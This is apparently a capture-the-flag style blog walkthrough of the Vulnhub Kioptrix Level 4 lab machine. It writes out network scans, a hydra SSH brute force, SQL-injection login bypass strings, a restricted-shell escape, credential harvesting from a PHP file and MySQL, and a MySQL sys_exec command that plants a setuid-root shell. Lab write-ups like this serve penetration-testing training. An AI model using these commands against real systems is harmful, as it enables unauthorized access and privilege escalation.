Kioptrix Level 1.3 4

Vulnhub virtual machine; On the path to OSCP this box offered enumeration of services with enum4linux and credential extraction via SQL-i. The main escalation occurs from within MySQL through manipulating the sys_exec function. This was a well rounded crafted box.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


Locate VM on network

1
netdiscover -r 192.168.56.0/24

Enumeration

Nmap Scan

1
nmap -sV -sC -oA nmap/kio4 192.168.56.106

Interesting of note, standard SSH port open, Apache web-server on HTTP with PHP/5.2.4, Samba on Netbios leaking a workgroup: WORKGROUP and script results yielding potential doorways into the network.

Searchsploit Performing a quick search of vulnerabilies based off information from nmap

1
searchsploit php 5.2.4

Nothing quite useable.

1
searchsploit samba 3.x

few interesting finds for samba

Investigate the HTTP server navigate to 192.168.56.106

Interesting login page

checking source:

Discovered application is using a ‘checklogin.php’ page to validate credentials.

Perform SQL-injection entered username: admin' OR '1=1--

Returned wrong username… there might be content filtering occurring.

Perform enumeration of samba with enum4linux

1
enum4linux 192.168.56.106

Samba version has no public vulnerabilities but we did discover users

Users: nobody,robert,root,john, and loneferret

Brute-Force SSH (hydra) added list of users to a file name ‘users’

1
hydra -L users -P /usr/share/wordlists/rockyou.txt -t 4 192.168.56.106 ssh -vv

Hydra was not able to break into the front door. Time head back to the HTTP server.

Noticing that during the web-login it prompted that I was not the correct user with my SQL injection. Lets try to repeat with usernames discovered.

SQL-injection Part deux Username: john Password: ' or 1=1 --

Well that an improvement - logout button

Username: robert Password: ' or 1=1 --

Bingo-bango! we have a username and password

Username robert
Password ADGAdsafdfwt4gadfga==

quickly to the SSH.

Remote Access/SSH

Let the enumeration begin

1
sudo -l

1
uname -a

1
which python

1
cd /

well that escalated quickly…

Escaping the restricted shell

1
echo os.system("/bin/bash")

Escaped!

Lets see whats on this web-server

You know what I want

1
cat checklogin.php

We discovered MySql database usernames and passwords. No impressed by this administrator and choices for passwords.

MySQL server enumeration

1
mysql -u root -p

Investigating

1
SHOW DATABASES

1
2
use members;
select * from members;

Acquired another password for john.

1 john MyNameIsJohn
2 robert ADGAdsafdfwt4gadfga==

MySQL running as root

just the avenue we can use to Priv-Esc

Priv-Esc

Using mysql to give us a nice entryway to root

1
2
mysql> use mysql;
show tables;

1
select * from func;

Root

1
2
3
select sys_exec('cp /bin/sh /tmp/shell; chown root /tmp/shell; chgrp root /tmp/shell; chmod u+s /tmp/shell');

mysql> \! /tmp shell

Bring me the root!

-exec

Further Reading/Sources:

MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux - link